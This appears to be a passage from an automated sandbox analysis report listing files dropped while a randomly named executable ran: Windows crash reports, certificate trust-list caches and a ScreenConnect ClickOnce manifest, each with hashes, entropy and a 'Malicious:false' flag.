                                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.3.5.0.9.5.5.9.1.5.7.3.8.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.3.5.0.9.5.6.5.4.0.7.5.2.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.c.f.2.2.e.5.-.1.3.6.c.-.4.a.5.c.-.b.c.b.6.-.4.5.c.7.8.2.8.4.4.a.7.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.7.3.c.a.9.0.b.-.c.9.0.5.-.4.8.c.b.-.8.2.0.3.-.8.7.f.7.9.3.2.2.a.d.2.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.c.o.x.O.a.V.9.2.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.8.4.-.0.0.0.1.-.0.0.1.4.-.1.d.1.8.-.b.c.6.8.0.3.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.a.8.0.8.3.5.a.1.7.8.b.3.c.2.0.7.2.1.d.2.4.a.5.3.f.4.d.f.9.2.2.0.0.0.0.f.f.f.f.!.0.0.0.0.c.4.8.2.1.f.f.4.2.7.7.4.8.7.7.e.a.9.1.e.b.5.8.2.d.a.7.a.9.8.c.b.e.a.8.5.3.d.a.e.!.3.c.o.x.O.a.V.9.2.n...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Fri Oct 25 17:29:16 2024, 0x1205a4 type
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):81620
                                                                                                                                                                                                                                                      Entropy (8bit):1.6802980213883878
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:/e5t94Lp0X7ShpOhI/cvH0L90b04LvA+psI5Zu8p9ewTFkjbgjncbZ:gmLhshI/mH0L90bzTEq9e6jcb
                                                                                                                                                                                                                                                      MD5:50957DE4EF41F32E0ED027D2033DA256
                                                                                                                                                                                                                                                      SHA1:C46D5501DE0430293CA49A226EFEF6A15743E369
                                                                                                                                                                                                                                                      SHA-256:5BF52DF477238A39E1255BC5489B7D8265B1B179D719E60C69D89C3E15778005
                                                                                                                                                                                                                                                      SHA-512:F2A200805CF945E0BAD901231F76D570AB1573D9D11DD3ED64BDBC8CDB96E4EE040452557912495E28FB93C48DA0352681887A55DD5C98CFD68223DB213CAB05
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8330
                                                                                                                                                                                                                                                      Entropy (8bit):3.6989294798929144
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJrB6P3T6YEIlSU9sAgmfZtqsprB89bSSsf0Gm:R6lXJ96P3T6YE6SU9sAgmfZtqPSRf8
                                                                                                                                                                                                                                                      MD5:296DD4421D9398B1DB3D81147C71AE80
                                                                                                                                                                                                                                                      SHA1:C948A7F499EE80E29D23A1CA85CCCEB29B70E19A
                                                                                                                                                                                                                                                      SHA-256:8C9949B72D037DB4BE86BDDA21DA5970F1187E46EF3B7FFC828E7225871EBCCB
                                                                                                                                                                                                                                                      SHA-512:89F966CE3F720472A1C4285A09231F9D89011BE4B7A1CD2B3950047AF5A78C1AAE4CF4048392F421B70777D00B30E4DA36F83515586F8682137E17954EACA02C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.0.8.<./.P.i.
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4593
                                                                                                                                                                                                                                                      Entropy (8bit):4.470876117459452
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zszJg77aI9ClWpW8VYRYm8M4J8zGLFL+q8VsFpjRm7rmad:uIjfNI7wU7VZJ8zosUpNm7rmad
                                                                                                                                                                                                                                                      MD5:196FE76F3FD8FA0CEB00B2349D667F1F
                                                                                                                                                                                                                                                      SHA1:FEDE8B195E3AF7F420B0F9EED974C2609B0A56F7
                                                                                                                                                                                                                                                      SHA-256:9CD6974C2092B0A6DA5315A026FCECF9D572D90CE4CD7B4C8C08BF123523BED7
                                                                                                                                                                                                                                                      SHA-512:5FD7582CAEE323B28AB82EAF3A5667F0B8FEF79C78D5C88101D353A05BF054F4E678DDCFF4B5CBB5425546EC1EC32C16A70EC62C357428E1F8B402343CBEDBB6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="559231" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):83530
                                                                                                                                                                                                                                                      Entropy (8bit):3.1261456234881067
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:zyKatcq3wejI8/bcYRR78uSm2/0MN0DG/q7UJoHUGhU40sU1:eKucq37jI8Tc1qY0MN0DGCrHnUTs6
                                                                                                                                                                                                                                                      MD5:5580A334452CECE916505DC97F0663CB
                                                                                                                                                                                                                                                      SHA1:6658CF91F9313B3EAD8596736A14604D14742E36
                                                                                                                                                                                                                                                      SHA-256:ED87F6E41B9816CD00D2D8DB8B8A0C3FAE5BACBD0D09FB1D657B932A01CF2585
                                                                                                                                                                                                                                                      SHA-512:00FC6C61BC603669C7401CED44179221B11AADCB89008B7599EEFEAEA937457CB4572F286F3044545ABEFEB05E1375FB9E77B93CCC631889DA661DDF694D7728
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):13340
                                                                                                                                                                                                                                                      Entropy (8bit):2.684279421165718
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:TiZYWeruQ64NYZYlWzHoYEZHFt8inL8tdw0k0aeslMYQnIbQ3:2ZDAOW29aeslMYQIbQ3
                                                                                                                                                                                                                                                      MD5:B9B707B003C05D88798857998174BD18
                                                                                                                                                                                                                                                      SHA1:8F4C331FF9C5D0A1F79BE1D3C375F8B6FB432D90
                                                                                                                                                                                                                                                      SHA-256:C05152978E100E9161FB0DB9C4FAEF82E915F2A6A7D9D89BDB519FF2717BF792
                                                                                                                                                                                                                                                      SHA-512:D186563E5360C52879C8FE0145E825F5C59018153AC34CFFEA6C07D3CA33AC9D45092698155743BDD2398A42982C3E8CE04C5DD0411408B11683FD7E47FCEADD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4770
                                                                                                                                                                                                                                                      Entropy (8bit):7.946747821604857
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
                                                                                                                                                                                                                                                      MD5:1BFE591A4FE3D91B03CDF26EAACD8F89
                                                                                                                                                                                                                                                      SHA1:719C37C320F518AC168C86723724891950911CEA
                                                                                                                                                                                                                                                      SHA-256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
                                                                                                                                                                                                                                                      SHA-512:02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):71954
                                                                                                                                                                                                                                                      Entropy (8bit):7.996617769952133
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                                                                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                                                                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                                                                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                                                                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:Certificate, Version=3
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1716
                                                                                                                                                                                                                                                      Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                                      MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                                      SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                                      SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                                                      SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):727
                                                                                                                                                                                                                                                      Entropy (8bit):7.563840806637443
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:5onfZPc5RlRtBfQRKsS3GO1OfBJWPggSMcJD0Khky41hrQOSFxvF0nBwUU2wZ:5iFcdZ6KP3YHHMcJyyO9QOSunaT2wZ
                                                                                                                                                                                                                                                      MD5:23D2A40D03B92FF977A4F7F3F5B7B3D6
                                                                                                                                                                                                                                                      SHA1:DFAF45BE65A508FED92543473C235FB9E56EC900
                                                                                                                                                                                                                                                      SHA-256:42931FA0CF548D85BAB78A132B91B75AF2E8C94891568C976BE1C9B48D3ECAB1
                                                                                                                                                                                                                                                      SHA-512:2383D3513513D6D929FD1B7D780D152B3D8240EC013DEF216C6BAB6127B3C4BC523770A1BD388A84100C0672E68B6C46E62DDAAD78BB641E084C6F43690C1966
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:Certificate, Version=3
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1428
                                                                                                                                                                                                                                                      Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                                      MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                                      SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                                      SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                                      SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):338
                                                                                                                                                                                                                                                      Entropy (8bit):3.267890441105352
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:kKCRl7sN+SkQlPlEGYRMY9z+s3Ql2DUevat:6RFTkPlE99SCQl2DUevat
                                                                                                                                                                                                                                                      MD5:D1C659FB35BF7CE2FA88AD06001D3925
                                                                                                                                                                                                                                                      SHA1:CE36775A6CE264F8E49C369DB0FD7494B96F9EDC
                                                                                                                                                                                                                                                      SHA-256:C121E396FEA6A125C93C92C3F9395E2A2F345CBC0CAB48BF1177A1EEB57D7E7C
                                                                                                                                                                                                                                                      SHA-512:802D8276AAECA2FFCDAE976BD6E95879703B88F21EFF64105144CB7E4684E5C3B552DB8F609EA19B4BA86038C2387156C159B5ACC427E0B9A8A775DDD6BC5A6D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:p...... ........z.B..(..(....................................................... .........p.........$.....(=........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):328
                                                                                                                                                                                                                                                      Entropy (8bit):3.130277681168393
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:kKsPL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:UPiDnLNkPlE99SNxAhUe/3
                                                                                                                                                                                                                                                      MD5:C7E06CE842ADBFE300BC17D997AF7C7B
                                                                                                                                                                                                                                                      SHA1:7DD46627A2DB6C6452EAAFA4C70847DBB1A55E51
                                                                                                                                                                                                                                                      SHA-256:48D3AA68699E7B9281CB51D9C32638D5B8E3AE58AEF2F5E412FF9E4210541F1F
                                                                                                                                                                                                                                                      SHA-512:FD41726FFA52C77F37D08652982A32A07DBE0DC544FE18A2E24419699A21B28C2E4FA7B8EE40E2FFBFDFAC431F7FF8C365C528941899034BC744E967E210138C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:p...... ..........&.a'..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):308
                                                                                                                                                                                                                                                      Entropy (8bit):3.2220888806886414
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:p...... .........5.Nv'..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):412
                                                                                                                                                                                                                                                      Entropy (8bit):3.995557848806517
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:p...... ....(.......n'..(................].G{%....}p.*....................}p.*.. .........G..&.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):254
                                                                                                                                                                                                                                                      Entropy (8bit):3.042052853183184
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:p...... ....l...R..aN'..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):25496
                                                                                                                                                                                                                                                      Entropy (8bit):5.589617222565984
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):17858
                                                                                                                                                                                                                                                      Entropy (8bit):5.954498332217529
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.3.8936" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3452
                                                                                                                                                                                                                                                      Entropy (8bit):4.236954777604761
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1215
                                                                                                                                                                                                                                                      Entropy (8bit):5.132426421892876
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      Malicious:false
